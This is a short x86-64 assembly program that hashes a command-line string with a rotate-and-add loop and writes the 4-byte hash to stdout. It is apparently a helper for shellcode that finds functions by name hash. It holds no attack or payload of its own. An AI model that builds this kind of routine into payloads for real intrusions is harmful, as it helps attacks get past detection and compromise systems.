# 81 bytes .text .globl _start _start: jmp startup calc_hash: push %rax push %rdx initialize_regs: push %rdx pop %rax cld calc_hash_loop: lodsb rol $0xc, %edx add %eax, %edx test %al, %al jnz calc_hash_loop calc_done: push %rdx pop %rsi pop %rdx pop %rax ret startup: pop %rax pop %rax pop %rsi xor %rdx, %rdx call calc_hash push %rsi mov %rsp, %rsi push %rdx mov %rsp, %rcx mov $0x4, %rdi loop: dec %rdi movb (%rsi,%rdi,1), %al movb %al, (%rcx,%rdx,1) inc %rdx cmp %rdi, %r10 jnz loop mov %rcx, %rsi inc %rdi mov %rdi, %rax syscall mov $0x3c, %rax dec %rdi syscall |